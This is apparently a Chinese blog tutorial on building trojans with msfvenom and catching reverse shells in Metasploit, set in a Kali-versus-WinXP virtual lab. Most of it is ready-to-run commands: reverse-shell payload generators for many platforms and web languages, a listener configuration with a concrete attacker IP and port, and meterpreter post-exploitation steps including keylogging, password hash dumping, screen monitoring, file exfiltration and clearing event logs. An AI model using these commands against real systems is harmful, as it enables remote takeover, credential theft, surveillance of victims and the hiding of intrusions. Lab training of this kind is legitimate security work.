利用msfvenom制作木马,并且反弹shell
反弹shell原理:
反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。
工具
msfvenom:“msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线. 目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.”
msfconsole:msfconsole是msf的命令行交互界面。在msfconsole中,可以实现对msf的完美操作,是一个msf的一体化操作接口,可以完全地利用msf中的各种功能,使用msfconsole特定的命令进行操作
虚拟机准备
攻击机:kali 192.168.31.24
靶机:winXP 192.168.31.141
攻击过程
各种系统对应的马
Linuxmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Scripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
使用msfvenom生成木马
㈠
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe -o app.exe
㈡
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.24 LPORT=4444 -f exe > app.exe
启动msfconsole进入metasploit开始监听
进入监听模块
use exploit/multi/handler
设置payload反弹shell(使用和木马相同的payload)
set payload windows/meterpreter/reverse_tcp
设置LHOST、LPORT参数
set LHOST 192.168.31.24(本地IP)
set LPORT 4444(设置的端口)
查看设置是否成功
show options
开始攻击
run
或者
exploit
出现该界面,表示渗透成功,可以对测试机进行一波操作了
meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息
键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop
屏幕截图
screenshot
屏幕监控
run vnc
获取密文密码
hashdump
获取shell,进入cmd
shell
获取权限之后的操作-博客
获取shell,进入cmd
①输入shell 进入目标主机的cmd命令行
②输入systeminfo 查看目标主机的系统信息
③Ctrl+C退出到meterprete命令行
执行meterprete命令
④hashdump 获取目标主机的明文密码
⑤run vnc 进行屏幕监控
⑥clearev 清除日志
利用msfvenom制作木马,并且反弹shell相关推荐
- 利用msfvenom生成木马文件反弹shell
目录 1.安装靶机和攻击机 2.利用生成木马文件 3.msf里面开启监听 4.攻击成功且利用 5.meterpreter简单系统命令 1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSD ...
- 利用msfvenom制作windows木马及免杀马
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows, ...
- 如何利用matrox mil在picturebox中显示image_利用自拍照反弹shell
文章来源:洛米唯熊 0x00:前言 继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观.确实,新颖的利用方式.很有利用价值!闲话少说.今天,利用奇思妙想的方法来反弹shell.用 ...
- 「渗透」:一句话木马反弹shell的思路
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等:问题在于,不管用python.bash还是perl都反弹不了,偷不了懒,就上msf把. http://target- ...
- msfvenom生成木马和内网穿透
msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...
- ac2100 反弹shell无法粘贴_记一次突破反弹shell
背景 某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell. 测试 对着目标站点一顿测试. 发现确实存在shiro反序列化,并且存在可以利用的gadget.利用 发现确实可以执行命令 ...
- sqlplus中调用shell_记一次突破反弹shell
这是 酒仙桥六号部队 的第 106 篇文章. 全文共计1809个字,预计阅读时长6分钟. 背景 某天闲着无聊,小伙伴发来一个某网站,说只能执行命令,不能反弹shell. 测试 对着目标站点一顿测试. ...
- 常见的反弹shell的方法以及对反弹shell的解释
文章目录 一.什么是反弹shell,以及对反弹shell作用原理的解析: 3.反弹shell的本质 linux文件描述符 重定向 输入重定向 输出重定向 标准输出与标准错误输出重定向 文件描述符的复制 ...
- 网络安全-木马入侵windows -msfvenom反弹shell(CMD)
网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...
最新文章
- 智能经济的动力,从人工智能到超级智能
- 打印当前时间 毫秒_时间轮定时器
- 信息基础---LDPCcodes随机矩阵构造java项目源代码
- ssdb php客户端接口文档
- python中那纠结的os.system()与空格处理
- 跟我一起学Redis之五种基本类型及其应用场景举例(干了6个小时)
- 太可怕了! 五一外出还敢连WiFi?
- asterisk meetme 会议实现
- Word图片保存后失真(变模糊)解决方法
- 【LWP,进程,线程】Linux
- 解决VS Community“无法刷新此账户的凭证”和“无法添加此账户”的问题
- LeetCode 题解之 824. Goat Latin
- 【代码审计】iCMS_v7.0.7 keywords.admincp.php页面存在SQL注入漏洞分析
- flex开发包二——flare
- (转载)BOX2D V2.3.0 用户手册中文版(第2章)-Hello Box2D
- linux压缩命令讲解,Linux下的压缩解压缩命令详解
- VS2019 使用GIT
- 华章IT图书书讯(2012年第3期)
- 【架构设计】酒店预订应用程序的系统设计架构(如 Airbnb、OYO)
- 【5G核心网】控制面与用户面协议栈